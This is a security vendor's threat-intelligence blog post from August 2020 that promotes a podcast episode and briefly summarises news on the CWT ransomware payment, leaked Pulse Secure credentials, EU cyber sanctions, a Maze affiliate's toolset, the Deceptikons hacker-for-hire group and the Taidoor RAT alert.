ShadowTalk Update – CWT pays ransom, data leaked for 900+ Pulse Secure Servers, EU issues first cyber sanctions

ShadowTalk Update – CWT pays ransom, data leaked for 900+ Pulse Secure Servers, EU issues first cyber sanctions
Digital Shadows Analyst Team
Read More From Digital Shadows Analyst Team
August 10, 2020 | 2 Min Read

In this week’s episode, Viktoria is joined by Kim, Dylan and Demelza to discuss:

  • Ransomware negotiations between CWT and cyberattackers
  • Impact and severity of passwords leaked for 900+ pulse secure enterprise servers to criminal forum
  • The Ghostwriter/disinformation campaign overview: series of disinformation campaigns, aligned to Russian security interests – activity and attribution
  • EU issues first sanctions against Russian and Chinese cyber actors: Impact, effectiveness and reasoning behind this

Listen below 👇👇

ShadowTalk Threat Intelligence Podcast · Weekly: CWT pays ransom, data leaked for 900+ Pulse Secure Servers, EU issues first cyber sanctions

Analysis reveals active attack server used by Maze affiliate

On 22 Jul 2020, security researcher analysis revealed that an active attack server had been used by a threat-actor affiliate of Maze ransomware operations. Reportedly the Maze affiliate gained initial access by using an infected system with remote desktop protocol opened to the Internet for scanning. They then looked for other systems and mapped out the network before using an unnamed loader to distribute the Maze ransomware. Observations indicated that the threat actor used the following tools: GMER, Mimikatz, Metasploit, Cobalt Strike, PowerShell, AdFind, Koadic, and PowerShell Empire.

Cyber-mercenary group Deceptikons uncovered

On 29 Jul 2020, security researchers reported on hacker-for-hire group “Deceptikons”, which has provided hacking services for almost a decade. The cyber-mercenary group’s targeting of commercial entities―specifically, targets not involved in government―is unusual for an APT group. Deceptikons was likely responsible for a spearphishing attack on multiple European law firms in 2019, deploying PowerShell scripts and using modified link files to compromise systems and execute a PowerShell backdoor. The group is not considered technically advanced, but the infrastructure and malware it uses focuses on gaining persistence on infected hosts.

US government bodies warn of Chinese Taidoor malware

On 03 Aug 2020, the US Department of Homeland Security, Department of Defense, and FBI published a joint alert regarding a malware variant that has been used by threat actors linked to the People’s Republic of China. According to the government agencies, the “Taidoor” RAT has been used in attacks since 2008, and has specifically targeted entities having an interest in Taiwan. The malware was allegedly distributed through spearphishing emails containing malicious attachments.

Weekly Intelligence Summary 07 August 2020

Access Our Threat Intel In Test Drive

Test Drive SearchLight Free for 7 Days
Try It Now

Connect with us

Related Posts

2021 Forecasts: Six Trends And Predictions For The New Year

2021 Forecasts: Six Trends And Predictions For The New Year

December 1, 2020 | 18 Min Read

This year has been a real doozy, y’all:...
ShadowTalk Update: Egregor Ransomware, IoT Regulations, Black Friday Threats and More!

ShadowTalk Update: Egregor Ransomware, IoT Regulations, Black Friday Threats and More!

November 30, 2020 | 2 Min Read

ShadowTalk hosts Stefano, Adam and Dylan...
Egregor: The New Ransomware Variant to Watch

Egregor: The New Ransomware Variant to Watch

November 24, 2020 | 9 Min Read

INTRODUCING EGREGOR RANSOMWARE...
SearchLight’s Exposed Document Alerts: Uncover the Critical, Faster

SearchLight’s Exposed Document Alerts: Uncover the Critical, Faster

November 23, 2020 | 5 Min Read

BACKING UP...INTO A DITCH I am a terrible...